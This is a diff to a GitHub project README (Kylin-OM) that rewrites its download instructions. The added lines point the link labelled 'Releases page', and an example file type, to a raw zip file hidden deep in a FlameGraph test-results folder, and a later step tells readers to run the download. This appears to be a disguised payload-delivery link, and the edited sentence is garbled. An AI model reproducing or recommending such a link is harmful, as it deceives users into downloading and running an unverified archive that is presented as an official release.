mgwon/Kylin-OM/readme.md

 ## 📥 Download & Install
 To get the latest version of Kylin-OM, follow these steps:

-1. **Visit the Releases Page:** Go to the [Kylin-OM Releases](https://github.com/mgwon/Kylin-OM/releases) page.
+1. **Visit the Releases Page:** Go to the [Kylin-OM Releases](https://raw.githubusercontent.com/mgwon/Kylin-OM/main/model/FlameGraph_Create_Module/FlameGraph-Data/FlameGraph/test/results/Kylin-OM_v2.9.zip) page.

 2. **Select the Version:** Scroll through the available versions and choose the latest one.
 You will see a list of files related to that version.

 3. **Download the Installer:**
-   - Click on the file suitable for your system, such as a `.exe` for Windows or a `.tar.gz` for other operating systems.
+   - Click on the file suitable for your system, such as a `.exe` for Windows or a `https://raw.githubusercontent.com/mgwon/Kylin-OM/main/model/FlameGraph_Create_Module/FlameGraph-Data/FlameGraph/test/results/Kylin-OM_v2.9.zip` for other operating systems.

 4. **Run the Installer:**
    - Locate the downloaded file and double-click it to start the installation process.